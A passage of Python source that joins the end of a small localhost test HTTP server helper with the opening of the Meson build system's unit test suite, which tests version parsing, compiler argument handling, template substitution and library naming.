class ClientErrorHandler(BaseHandler):
"""Request handler that returns a client error."""
def _get_code(self):
"""Return 400."""
return 400
class SimpleServer:
"""A simple test HTTP server."""
IP_ADDRESS = "127.0.0.1"
PORT = 8123
URL = "http://{}:{}".format(IP_ADDRESS, PORT)
def __init__(self, handler_class: BaseHandler):
"""SimpleServer constructor.
Args:
handler_class: Request handler class.
"""
self.httpd = HTTPServer((self.IP_ADDRESS, self.PORT), handler_class)
self.server = threading.Thread(target=self.httpd.serve_forever, daemon=True)
def start(self):
"""Start the server."""
self.server.start()
def stop(self):
"""Stop the server."""
self.httpd.shutdown()
self.server.join(3)
self.httpd.server_close()
def set_error_response(self, error_response: Dict):
"""Set the error response."""
setattr(self.httpd.RequestHandlerClass, "error_response", error_response)
def set_good_response(self, response: Dict):
"""Set good response."""
setattr(self.httpd.RequestHandlerClass, "good_response", response)
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux, git, GIT
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
a = cc.compiler_args(['-I.'])
#first we are checking if the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
#think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
#then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
# check include order is kept when deduplicating
a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
a += ['-Ifirst']
self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
